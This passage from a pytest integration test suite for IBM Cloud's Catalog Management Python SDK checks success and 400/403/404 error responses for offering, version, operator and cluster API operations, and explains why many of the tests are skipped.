def test_get_catalog_audit(self):
assert catalog_id is not None
get_catalog_audit_response = self.catalog_management_service_authorized.get_catalog_audit(
catalog_identifier=catalog_id,
)
assert get_catalog_audit_response.get_status_code() == 200
audit_log = get_catalog_audit_response.get_result()
assert audit_log is not None
####
# Get Consumption Offerings
####
@needscredentials
def test_get_consumption_offerings_returns_403_when_user_is_not_authorized(self):
assert catalog_id is not None
try:
self.catalog_management_service_not_authorized.get_consumption_offerings(
catalog=catalog_id,
select='all',
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_get_consumption_offerings_returns_404_when_no_such_catalog(self):
assert catalog_id is not None
try:
self.catalog_management_service_authorized.get_consumption_offerings(
catalog='invalid-'+catalog_id,
select='all',
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_get_consumption_offerings(self):
assert catalog_id is not None
get_consumption_offerings_response = self.catalog_management_service_authorized.get_consumption_offerings(
catalog=catalog_id,
select='all',
)
assert get_consumption_offerings_response.get_status_code() == 200
offering_search_result = get_consumption_offerings_response.get_result()
assert offering_search_result is not None
####
# Import Offering Version
####
@needscredentials
def test_import_offering_version_returns_400_when_backend_input_validation_fails(self):
assert catalog_id is not None
assert offering_id is not None
try:
self.catalog_management_service_authorized.import_offering_version(
catalog_identifier=catalog_id,
offering_id=offering_id,
target_kinds=['rocks'],
zipurl=import_offering_zip_url,
target_version='0.0.3',
repo_type=repo_type_git_public,
)
except ApiException as e:
assert e.code == 400
@needscredentials
def test_import_offering_version_returns_404_when_no_such_offerings(self):
assert catalog_id is not None
assert offering_id is not None
try:
self.catalog_management_service_authorized.import_offering_version(
catalog_identifier=catalog_id,
offering_id='invalid-'+offering_id,
target_kinds=[kind_roks],
zipurl=import_offering_zip_url,
target_version='0.0.3',
repo_type=repo_type_git_public,
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_import_offering_version_returns_403_when_user_is_not_authorized(self):
assert catalog_id is not None
assert offering_id is not None
try:
self.catalog_management_service_not_authorized.import_offering_version(
catalog_identifier=catalog_id,
offering_id=offering_id,
target_kinds=[kind_roks],
zipurl=import_offering_zip_url,
target_version='0.0.3',
repo_type=repo_type_git_public,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_import_offering_version(self):
assert catalog_id is not None
assert offering_id is not None
import_offering_version_response = self.catalog_management_service_authorized.import_offering_version(
catalog_identifier=catalog_id,
offering_id=offering_id,
target_kinds=[kind_roks],
zipurl=import_offering_zip_url,
target_version='0.0.3',
repo_type=repo_type_git_public,
)
assert import_offering_version_response.get_status_code() == 201
offering = import_offering_version_response.get_result()
assert offering is not None
####
# Replace Offering Icon
####
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_replace_offering_icon_returns_404_when_no_such_offerings(self):
assert catalog_id is not None
assert offering_id is not None
# this feature is disabled
try:
self.catalog_management_service_authorized.replace_offering_icon(
catalog_identifier=catalog_id,
offering_id='invalid-'+offering_id,
file_name='filename.jpg',
)
except ApiException as e:
assert e.code == 404
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_replace_offering_icon_returns_403_when_user_is_not_authorized(self):
assert catalog_id is not None
assert offering_id is not None
# this feature is disabled
try:
self.catalog_management_service_not_authorized.replace_offering_icon(
catalog_identifier=catalog_id,
offering_id=offering_id,
file_name='filename.jpg',
)
except ApiException as e:
assert e.code == 403
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_replace_offering_icon(self):
assert catalog_id is not None
assert offering_id is not None
# this feature is disabled
replace_offering_icon_response = self.catalog_management_service_authorized.replace_offering_icon(
catalog_identifier=catalog_id,
offering_id=offering_id,
file_name='filename.jpg',
)
assert replace_offering_icon_response.get_status_code() == 200
offering = replace_offering_icon_response.get_result()
assert offering is not None
####
# Update Offering IBM
####
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_update_offering_ibm_returns_400_when_backend_input_validation_fails(self):
assert catalog_id is not None
assert offering_id is not None
# once the user is granted this operation, the test can be executed
try:
self.catalog_management_service_authorized.update_offering_ibm(
catalog_identifier=catalog_id,
offering_id=offering_id,
approval_type='bogus approval type',
approved='true',
)
except ApiException as e:
assert e.code == 400
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_update_offering_ibm_returns_404_when_no_such_offerings(self):
assert catalog_id is not None
assert offering_id is not None
# once the user is granted this operation, a 404 can be elicited from the service; until then the test is disabled
try:
self.catalog_management_service_authorized.update_offering_ibm(
catalog_identifier=catalog_id,
offering_id='invalid-'+offering_id,
approval_type='allow_request',
approved='true',
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_update_offering_ibm_returns_403_when_user_is_not_authorized(self):
assert catalog_id is not None
assert offering_id is not None
try:
self.catalog_management_service_not_authorized.update_offering_ibm(
catalog_identifier=catalog_id,
offering_id=offering_id,
approval_type='allow_request',
approved='true',
)
except ApiException as e:
assert e.code == 403
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_update_offering_ibm(self):
assert catalog_id is not None
assert offering_id is not None
# once the user is granted this operation, the test can be executed
update_offering_ibm_response = self.catalog_management_service_authorized.update_offering_ibm(
catalog_identifier=catalog_id,
offering_id=offering_id,
approval_type='allow_request',
approved='true',
)
assert update_offering_ibm_response.get_status_code() == 200
approval_result = update_offering_ibm_response.get_result()
assert approval_result is not None
####
# Get Offering Updates
####
@needscredentials
def test_get_offering_updates_returns_400_when_backend_input_validation_fails(self):
assert catalog_id is not None
assert offering_id is not None
try:
self.catalog_management_service_authorized.get_offering_updates(
catalog_identifier=catalog_id,
offering_id=offering_id,
kind='rocks',
version='0.0.2',
cluster_id=self.cluster_id,
region=region_us_south,
)
except ApiException as e:
assert e.code == 400
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_get_offering_updates_returns_404_when_no_such_offerings(self):
assert catalog_id is not None
assert offering_id is not None
# the service always complains about offering types, which is somehow related to create/import offerings;
# once this is resolved, a 404 can likely be elicited from the service
try:
self.catalog_management_service_authorized.get_offering_updates(
catalog_identifier=catalog_id,
offering_id='invalid-'+offering_id,
version='0.0.2',
kind=kind_vpe,
cluster_id=self.cluster_id,
region=region_us_south,
namespace=namespace_python_sdk,
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_get_offering_updates_returns_403_when_user_is_not_authorized(self):
assert catalog_id is not None
assert offering_id is not None
try:
self.catalog_management_service_not_authorized.get_offering_updates(
catalog_identifier=catalog_id,
offering_id=offering_id,
kind=kind_roks,
version='0.0.2',
cluster_id=self.cluster_id,
region=region_us_south,
namespace=namespace_python_sdk,
)
except ApiException as e:
assert e.code == 403
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_get_offering_updates(self):
assert catalog_id is not None
assert offering_id is not None
# requires a special offering
# Error: Could not find kind[roks] for offering
get_offering_updates_response = self.catalog_management_service_authorized.get_offering_updates(
catalog_identifier=catalog_id,
offering_id=offering_id,
kind=kind_roks,
version='0.0.2',
cluster_id=self.cluster_id,
region=region_us_south,
namespace=namespace_python_sdk,
)
assert get_offering_updates_response.get_status_code() == 200
list_version_update_descriptor = get_offering_updates_response.get_result()
assert list_version_update_descriptor is not None
####
# Get Offering About
####
@needscredentials
def test_get_offering_about_returns_400_when_backend_input_validation_fails(self):
try:
self.catalog_management_service_authorized.get_offering_about(
version_loc_id=bogus_version_locator_id,
)
except ApiException as e:
assert e.code == 400
@needscredentials
def test_get_offering_about_returns_404_when_no_such_version(self):
assert version_locator_id is not None
try:
self.catalog_management_service_authorized.get_offering_about(
version_loc_id='invalid-'+version_locator_id,
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_get_offering_about_returns_403_when_user_is_not_authorized(self):
assert version_locator_id is not None
try:
self.catalog_management_service_not_authorized.get_offering_about(
version_loc_id=version_locator_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_get_offering_about(self):
assert version_locator_id is not None
get_offering_about_response = self.catalog_management_service_authorized.get_offering_about(
version_loc_id=version_locator_id,
)
assert get_offering_about_response.get_status_code() == 200
result = get_offering_about_response.get_result()
assert result is not None
####
# Get Offering License
####
@needscredentials
def test_get_offering_license_returns_400_when_backend_input_validation_fails(self):
assert version_locator_id is not None
try:
self.catalog_management_service_authorized.get_offering_license(
version_loc_id=bogus_version_locator_id,
license_id='license-id-is-needed',
)
except ApiException as e:
assert e.code == 400
@needscredentials
def test_get_offering_license_returns_404_when_no_such_version(self):
assert version_locator_id is not None
try:
self.catalog_management_service_authorized.get_offering_license(
version_loc_id='invalid-'+version_locator_id,
license_id='license-id-is-needed',
)
except ApiException as e:
assert e.code == 404
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_get_offering_license_returns_403_when_user_is_not_authorized(self):
assert version_locator_id is not None
try:
self.catalog_management_service_not_authorized.get_offering_license(
version_loc_id=version_locator_id,
license_id='license-id-is-needed',
)
except ApiException as e:
assert e.code == 403
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_get_offering_license(self):
assert version_locator_id is not None
get_offering_license_response = self.catalog_management_service_authorized.get_offering_license(
version_loc_id=version_locator_id,
license_id='license-id-is-needed',
)
assert get_offering_license_response.get_status_code() == 200
result = get_offering_license_response.get_result()
assert result is not None
####
# Get Offering Container Images
####
@needscredentials
def test_get_offering_container_images_returns_400_when_backend_input_validation_fails(self):
try:
self.catalog_management_service_authorized.get_offering_container_images(
version_loc_id=bogus_version_locator_id,
)
except ApiException as e:
assert e.code == 400
@needscredentials
def test_get_offering_container_images_returns_404_when_no_such_version(self):
assert version_locator_id is not None
try:
self.catalog_management_service_authorized.get_offering_container_images(
version_loc_id='invalid-'+version_locator_id,
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_get_offering_container_images_returns_403_when_user_is_not_authorized(self):
assert version_locator_id is not None
try:
self.catalog_management_service_not_authorized.get_offering_container_images(
version_loc_id=version_locator_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_get_offering_container_images(self):
assert version_locator_id is not None
get_offering_container_images_response = self.catalog_management_service_authorized.get_offering_container_images(
version_loc_id=version_locator_id,
)
assert get_offering_container_images_response.get_status_code() == 200
image_manifest = get_offering_container_images_response.get_result()
assert image_manifest is not None
####
# Deprecate Version
####
@needscredentials
def test_deprecate_version_returns_404_when_no_such_version(self):
assert version_locator_id is not None
try:
self.catalog_management_service_authorized.deprecate_version(
version_loc_id='invalid-'+version_locator_id,
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_deprecate_version_returns_400_when_backend_input_validation_fails(self):
try:
self.catalog_management_service_authorized.deprecate_version(
version_loc_id=bogus_version_locator_id,
)
except ApiException as e:
assert e.code == 400
@needscredentials
def test_deprecate_version_returns_403_when_user_is_not_authorized(self):
assert version_locator_id is not None
try:
self.catalog_management_service_not_authorized.deprecate_version(
version_loc_id=version_locator_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_deprecate_version(self):
assert version_locator_id is not None
# depends on the version state-transition workflow
# Error: Cannot request the state deprecated from the current state new.
deprecate_version_response = self.catalog_management_service_authorized.deprecate_version(
version_loc_id=version_locator_id
)
assert deprecate_version_response.get_status_code() == 202
####
# Account Publish Version
####
@needscredentials
def test_account_publish_version_returns_400_when_backend_input_validation_fails(self):
try:
self.catalog_management_service_authorized.account_publish_version(
version_loc_id=bogus_version_locator_id,
)
except ApiException as e:
assert e.code == 400
@needscredentials
def test_account_publish_version_returns_404_when_no_such_version(self):
assert version_locator_id is not None
try:
self.catalog_management_service_authorized.account_publish_version(
version_loc_id='invalid-'+version_locator_id,
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_account_publish_version_returns_403_when_user_is_not_authorized(self):
assert version_locator_id is not None
try:
self.catalog_management_service_not_authorized.account_publish_version(
version_loc_id=version_locator_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_account_publish_version(self):
assert version_locator_id is not None
# the sequence of state transitions is unknown
# Error: Cannot request the state account-published from the current state new.
account_publish_version_response = self.catalog_management_service_authorized.account_publish_version(
version_loc_id=version_locator_id,
)
assert account_publish_version_response.get_status_code() == 202
####
# IBM Publish Version
####
@needscredentials
def test_ibm_publish_version_400_when_backend_input_validation_fails(self):
try:
self.catalog_management_service_authorized.ibm_publish_version(
version_loc_id=bogus_version_locator_id,
)
except ApiException as e:
assert e.code == 400
@needscredentials
def test_ibm_publish_version_404_when_no_such_version(self):
assert version_locator_id is not None
try:
self.catalog_management_service_authorized.ibm_publish_version(
version_loc_id='invalid-'+version_locator_id,
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_ibm_publish_version_403_when_user_is_not_authorized(self):
assert version_locator_id is not None
try:
self.catalog_management_service_not_authorized.ibm_publish_version(
version_loc_id=version_locator_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_ibm_publish_version(self):
assert version_locator_id is not None
# user is not allowed to publish
ibm_publish_version_response = self.catalog_management_service_authorized.ibm_publish_version(
version_loc_id=version_locator_id,
)
assert ibm_publish_version_response.get_status_code() == 202
####
# Public Publish Version
####
@needscredentials
def test_public_publish_version_returns_400_when_backend_input_validation_fails(self):
try:
self.catalog_management_service_authorized.public_publish_version(
version_loc_id=bogus_version_locator_id,
)
except ApiException as e:
assert e.code == 400
@needscredentials
def test_public_publish_version_returns_404_when_no_such_version(self):
assert version_locator_id is not None
try:
self.catalog_management_service_authorized.public_publish_version(
version_loc_id='invalid-'+version_locator_id,
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_public_publish_version_returns_403_when_user_is_not_authorized(self):
assert version_locator_id is not None
try:
self.catalog_management_service_not_authorized.public_publish_version(
version_loc_id=version_locator_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_public_publish_version(self):
assert version_locator_id is not None
# the user is not granted this operation
public_publish_version_response = self.catalog_management_service_authorized.public_publish_version(
version_loc_id=version_locator_id,
)
assert public_publish_version_response.get_status_code() == 202
####
# Commit Version
####
@needscredentials
def test_commit_version_returns_400_when_backend_input_validation_fails(self):
try:
self.catalog_management_service_authorized.commit_version(
version_loc_id=bogus_version_locator_id,
)
except ApiException as e:
assert e.code == 400
@needscredentials
def test_commit_version_returns_404_when_no_such_version(self):
assert version_locator_id is not None
try:
self.catalog_management_service_authorized.commit_version(
version_loc_id='invalid-'+version_locator_id,
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_commit_version_returns_403_when_user_is_not_authorized(self):
assert version_locator_id is not None
try:
self.catalog_management_service_not_authorized.commit_version(
version_loc_id=version_locator_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_commit_version(self):
assert version_locator_id is not None
# depends on the version workflow
# Error: Could not find a working copy for the active version with id
commit_version_response = self.catalog_management_service_authorized.commit_version(
version_loc_id=version_locator_id,
)
assert commit_version_response.get_status_code() == 200
####
# Copy Version
####
@needscredentials
def test_copy_version_returns_403_when_user_is_not_authorized(self):
assert version_locator_id is not None
try:
self.catalog_management_service_not_authorized.copy_version(
version_loc_id=version_locator_id,
target_kinds=[kind_roks],
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_copy_version_returns_404_when_no_such_version(self):
assert version_locator_id is not None
try:
self.catalog_management_service_authorized.copy_version(
version_loc_id='invalid-'+version_locator_id,
target_kinds=[kind_roks],
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_copy_version_returns_400_when_backend_input_validation_fails(self):
try:
self.catalog_management_service_authorized.copy_version(
version_loc_id=bogus_version_locator_id,
target_kinds=[kind_roks],
)
except ApiException as e:
assert e.code == 400
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_copy_version(self):
assert version_locator_id is not None
# Error: Only helm charts can be copied to a new target at this time.
copy_version_response = self.catalog_management_service_authorized.copy_version(
version_loc_id=version_locator_id,
target_kinds=[kind_roks],
)
assert copy_version_response.get_status_code() == 200
####
# Get Offering Working Copy
####
@needscredentials
def test_get_offering_working_copy_returns_400_when_backend_input_validation_fails(self):
try:
self.catalog_management_service_authorized.get_offering_working_copy(
version_loc_id=bogus_version_locator_id,
)
except ApiException as e:
assert e.code == 400
@needscredentials
def test_get_offering_working_copy_returns_403_when_user_is_not_authorized(self):
assert version_locator_id is not None
try:
self.catalog_management_service_not_authorized.get_offering_working_copy(
version_loc_id=version_locator_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_get_offering_working_copy_returns_404_when_no_such_version(self):
assert version_locator_id is not None
try:
self.catalog_management_service_authorized.get_offering_working_copy(
version_loc_id='invalid-'+version_locator_id,
)
except ApiException as e:
assert e.code == 404
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_get_offering_working_copy(self):
assert version_locator_id is not None
# workflow problem
# Error: Cannot create a working copy for version 60cb36c3-39fd-40ed-9887-6bc98aa7b7be. The version
# must be in a published state, deprecated state, or invalidated state to create a working copy
get_offering_working_copy_response = self.catalog_management_service_authorized.get_offering_working_copy(
version_loc_id=version_locator_id,
)
assert get_offering_working_copy_response.get_status_code() == 200
version = get_offering_working_copy_response.get_result()
assert version is not None
####
# Get Version
####
@needscredentials
def test_get_version_returns_400_when_backend_input_validation_fails(self):
try:
self.catalog_management_service_authorized.get_version(
version_loc_id=bogus_version_locator_id,
)
except ApiException as e:
assert e.code == 400
@needscredentials
def test_get_version_returns_404_when_no_such_version(self):
assert version_locator_id is not None
try:
self.catalog_management_service_authorized.get_version(
version_loc_id='invalid-'+version_locator_id,
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_get_version_returns_403_when_user_is_not_authorized(self):
assert version_locator_id is not None
try:
self.catalog_management_service_not_authorized.get_version(
version_loc_id=version_locator_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_get_version(self):
assert version_locator_id is not None
get_version_response = self.catalog_management_service_authorized.get_version(
version_loc_id=version_locator_id,
)
assert get_version_response.get_status_code() == 200
offering = get_version_response.get_result()
assert offering is not None
####
# Get Cluster
####
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_get_cluster_returns_403_when_user_is_not_authorized(self):
# possibly this user doesn't have the right to execute this operation
try:
self.catalog_management_service_not_authorized.get_cluster(
cluster_id=self.cluster_id,
region=region_us_south,
x_auth_refresh_token=self.refresh_token_not_authorized,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_get_cluster_returns_404_when_no_such_cluster(self):
try:
self.catalog_management_service_authorized.get_cluster(
cluster_id='invalid-'+self.cluster_id,
region=region_us_south,
x_auth_refresh_token=self.refresh_token_authorized,
)
except ApiException as e:
assert e.code == 404
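# Cluster-scoped operations additionally require an IAM refresh token, passed
# as x_auth_refresh_token; each client supplies its own token alongside its
# bearer credentials.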
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_get_cluster(self):
# possibly this user doesn't have the right to get the cluster details;
# until this is clarified, the test is skipped
# Error: The specified cluster could not be found. If applicable, make sure that you target
# the correct account and resource group.
get_cluster_response = self.catalog_management_service_authorized.get_cluster(
cluster_id=self.cluster_id,
region=region_us_south,
x_auth_refresh_token=self.refresh_token_authorized,
)
assert get_cluster_response.get_status_code() == 200
cluster_info = get_cluster_response.get_result()
assert cluster_info is not None
####
# Get Namespaces
####
@needscredentials
def test_get_namespaces_returns_404_when_no_such_cluster(self):
try:
self.catalog_management_service_authorized.get_namespaces(
cluster_id='invalid-'+self.cluster_id,
region=region_us_south,
x_auth_refresh_token=self.refresh_token_authorized,
)
except ApiException as e:
assert e.code == 404
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_get_namespaces_returns_403_when_user_is_not_authorized(self):
# possibly this user doesn't have the right to get the cluster details;
# until this is clarified, the test is skipped
# Error: The specified cluster could not be found. If applicable, make sure that you target
# the correct account and resource group.
try:
self.catalog_management_service_not_authorized.get_namespaces(
cluster_id=self.cluster_id,
region=region_us_south,
x_auth_refresh_token=self.refresh_token_not_authorized,
)
except ApiException as e:
assert e.code == 403
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_get_namespaces(self):
# possibly this user doesn't have the right to get the cluster details;
# until this is clarified, the test is skipped
# Error: The specified cluster could not be found. If applicable, make sure that you target
# the correct account and resource group.
get_namespaces_response = self.catalog_management_service_authorized.get_namespaces(
cluster_id=self.cluster_id,
region=region_us_south,
x_auth_refresh_token=self.refresh_token_authorized,
)
assert get_namespaces_response.get_status_code() == 200
namespace_search_result = get_namespaces_response.get_result()
assert namespace_search_result is not None
####
# Deploy Operators
####
@needscredentials
def test_deploy_operators_returns_403_when_user_is_not_authorized(self):
assert version_locator_id is not None
try:
self.catalog_management_service_not_authorized.deploy_operators(
x_auth_refresh_token=self.refresh_token_not_authorized,
cluster_id=self.cluster_id,
region=region_us_south,
all_namespaces=True,
version_locator_id=version_locator_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_deploy_operators_returns_404_when_no_such_cluster(self):
assert version_locator_id is not None
try:
self.catalog_management_service_authorized.deploy_operators(
x_auth_refresh_token=self.refresh_token_authorized,
cluster_id='invalid-'+self.cluster_id,
region=region_us_south,
all_namespaces=True,
version_locator_id=version_locator_id,
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_deploy_operators_returns_400_when_backend_input_validation_fails(self):
try:
self.catalog_management_service_authorized.deploy_operators(
x_auth_refresh_token=self.refresh_token_authorized,
cluster_id=self.cluster_id,
region=region_us_south,
all_namespaces=True,
version_locator_id=bogus_version_locator_id,
)
except ApiException as e:
assert e.code == 400
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_deploy_operators(self):
assert version_locator_id is not None
# possibly this user doesn't have the right to get the cluster details;
# until this is clarified, the test is skipped
# Error: The specified cluster could not be found. If applicable, make sure that you target
# the correct account and resource group.
deploy_operators_response = self.catalog_management_service_authorized.deploy_operators(
x_auth_refresh_token=self.refresh_token_authorized,
cluster_id=self.cluster_id,
region=region_us_south,
all_namespaces=True,
version_locator_id=version_locator_id,
)
assert deploy_operators_response.get_status_code() == 200
list_operator_deploy_result = deploy_operators_response.get_result()
assert list_operator_deploy_result is not None
####
# List Operators
####
@needscredentials
def test_list_operators_returns_403_when_user_is_not_authorized(self):
assert version_locator_id is not None
try:
self.catalog_management_service_not_authorized.list_operators(
x_auth_refresh_token=self.refresh_token_not_authorized,
cluster_id=self.cluster_id,
region=region_us_south,
version_locator_id=version_locator_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_list_operators_returns_400_when_backend_input_validation_fails(self):
try:
self.catalog_management_service_authorized.list_operators(
x_auth_refresh_token=self.refresh_token_authorized,
cluster_id=self.cluster_id,
region=region_us_south,
version_locator_id=bogus_version_locator_id,
)
except ApiException as e:
assert e.code == 400
@needscredentials
def test_list_operators_returns_404_when_no_such_cluster(self):
assert version_locator_id is not None
try:
self.catalog_management_service_authorized.list_operators(
x_auth_refresh_token=self.refresh_token_authorized,
cluster_id='invalid-'+self.cluster_id,
region=region_us_south,
version_locator_id=version_locator_id,
)
except ApiException as e:
assert e.code == 404
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_list_operators(self):
assert version_locator_id is not None
# possibly this user doesn't have the right to get the cluster details;
# until this is clarified, the test is skipped
# Error: The specified cluster could not be found. If applicable, make sure that you target
# the correct account and resource group.
list_operators_response = self.catalog_management_service_authorized.list_operators(
x_auth_refresh_token=self.refresh_token_authorized,
cluster_id=self.cluster_id,
region=region_us_south,
version_locator_id=version_locator_id,
)
assert list_operators_response.get_status_code() == 200
list_operator_deploy_result = list_operators_response.get_result()
assert list_operator_deploy_result is not None
####
# Replace Operators
####
@needscredentials
def test_replace_operators_returns_403_when_user_is_not_authorized(self):
assert version_locator_id is not None
try:
self.catalog_management_service_not_authorized.replace_operators(
x_auth_refresh_token=self.refresh_token_not_authorized,
cluster_id=self.cluster_id,
region=region_us_south,
all_namespaces=True,
version_locator_id=version_locator_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_replace_operators_returns_404_when_no_such_cluster(self):
assert version_locator_id is not None
try:
self.catalog_management_service_authorized.replace_operators(
x_auth_refresh_token=self.refresh_token_authorized,
cluster_id='invalid-'+self.cluster_id,
region=region_us_south,
all_namespaces=True,
version_locator_id=version_locator_id,
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_replace_operators_returns_400_when_backend_input_validation_fails(self):
try:
self.catalog_management_service_authorized.replace_operators(
x_auth_refresh_token=self.refresh_token_authorized,
cluster_id=self.cluster_id,
region=region_us_south,
all_namespaces=True,
version_locator_id=bogus_version_locator_id,
)
except ApiException as e:
assert e.code == 400
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_replace_operators(self):
assert version_locator_id is not None
# possibly this user doesn't have the right to get the cluster details;
# until this is clarified, the test is skipped
# Error: The specified cluster could not be found. If applicable, make sure that you target
# the correct account and resource group.
replace_operators_response = self.catalog_management_service_authorized.replace_operators(
x_auth_refresh_token=self.refresh_token_authorized,
cluster_id=self.cluster_id,
region=region_us_south,
all_namespaces=True,
version_locator_id=version_locator_id,
)
assert replace_operators_response.get_status_code() == 200
list_operator_deploy_result = replace_operators_response.get_result()
assert list_operator_deploy_result is not None
####
# Install Version
####
@needscredentials
def test_install_version_returns_403_when_user_is_not_authorized(self):
assert version_locator_id is not None
try:
self.catalog_management_service_not_authorized.install_version(
version_loc_id=version_locator_id,
x_auth_refresh_token=self.refresh_token_not_authorized,
cluster_id=self.cluster_id,
region=region_us_south,
version_locator_id=version_locator_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_install_version_returns_404_when_no_such_cluster(self):
assert version_locator_id is not None
try:
self.catalog_management_service_authorized.install_version(
version_loc_id=version_locator_id,
x_auth_refresh_token=self.refresh_token_authorized,
cluster_id='invalid-'+self.cluster_id,
region=region_us_south,
version_locator_id=version_locator_id,
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_install_version_returns_400_when_backend_input_validation_fails(self):
try:
self.catalog_management_service_authorized.install_version(
version_loc_id=bogus_version_locator_id,
x_auth_refresh_token=self.refresh_token_authorized,
cluster_id=self.cluster_id,
region=region_us_south,
version_locator_id=bogus_version_locator_id,
)
except ApiException as e:
assert e.code == 400
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_install_version(self):
assert version_locator_id is not None
# possibly this user doesn't have the right to get the cluster details;
# until this is clarified, the test is skipped
# Error: The specified cluster could not be found. If applicable, make sure that you target
# the correct account and resource group.
install_version_response = self.catalog_management_service_authorized.install_version(
version_loc_id=version_locator_id,
x_auth_refresh_token=self.refresh_token_authorized,
cluster_id=self.cluster_id,
region=region_us_south,
version_locator_id=version_locator_id,
)
assert install_version_response.get_status_code() == 202
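# The same locator value is passed twice above: version_loc_id populates the
# request path, while version_locator_id is (presumably) carried again in the
# request body expected by the deploy operation.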
####
# Preinstall Version
####
@needscredentials
def test_preinstall_version_returns_403_when_user_is_not_authorized(self):
assert version_locator_id is not None
try:
self.catalog_management_service_not_authorized.preinstall_version(
version_loc_id=version_locator_id,
x_auth_refresh_token=self.refresh_token_not_authorized,
cluster_id=self.cluster_id,
region=region_us_south,
version_locator_id=version_locator_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_preinstall_version_returns_404_when_no_such_cluster(self):
# requires a version with a pre-install script attached, which has not been set up here;
# once it is, a 404 can be elicited from the cluster
assert version_locator_id is not None
try:
self.catalog_management_service_authorized.preinstall_version(
version_loc_id=version_locator_id,
x_auth_refresh_token=self.refresh_token_authorized,
cluster_id='invalid-'+self.cluster_id,
region=region_us_south,
version_locator_id=version_locator_id,
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_preinstall_version_returns_400_when_backend_input_validation_fails(self):
try:
self.catalog_management_service_authorized.preinstall_version(
version_loc_id=bogus_version_locator_id,
x_auth_refresh_token=self.refresh_token_authorized,
cluster_id=self.cluster_id,
region=region_us_south,
version_locator_id=bogus_version_locator_id,
)
except ApiException as e:
assert e.code == 400
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_preinstall_version(self):
assert version_locator_id is not None
# Error: Attempt to run pre-install script on a version that has no pre-install script specified
preinstall_version_response = self.catalog_management_service_authorized.preinstall_version(
version_loc_id=version_locator_id,
x_auth_refresh_token=self.refresh_token_authorized,
cluster_id=self.cluster_id,
region=region_us_south,
version_locator_id=version_locator_id,
)
assert preinstall_version_response.get_status_code() == 202
####
# Get Preinstall
####
@needscredentials
def test_get_preinstall_returns_403_when_user_is_not_authorized(self):
assert version_locator_id is not None
try:
self.catalog_management_service_not_authorized.get_preinstall(
version_loc_id=version_locator_id,
x_auth_refresh_token=self.refresh_token_not_authorized,
cluster_id=self.cluster_id,
region=region_us_south,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_get_preinstall_returns_404_when_no_such_version(self):
assert version_locator_id is not None
try:
self.catalog_management_service_authorized.get_preinstall(
version_loc_id='invalid-'+version_locator_id,
x_auth_refresh_token=self.refresh_token_authorized,
cluster_id=self.cluster_id,
region=region_us_south,
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_get_preinstall_returns_400_when_backend_input_validation_fails(self):
try:
self.catalog_management_service_authorized.get_preinstall(
version_loc_id=bogus_version_locator_id,
x_auth_refresh_token=self.refresh_token_authorized,
cluster_id=self.cluster_id,
region=region_us_south,
)
except ApiException as e:
assert e.code == 400
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_get_preinstall(self):
assert version_locator_id is not None
# Error: Attempt to get pre-install status on a version that has no pre-install script
get_preinstall_response = self.catalog_management_service_authorized.get_preinstall(
version_loc_id=version_locator_id,
x_auth_refresh_token=self.refresh_token_authorized,
cluster_id=self.cluster_id,
region=region_us_south,
)
assert get_preinstall_response.get_status_code() == 200
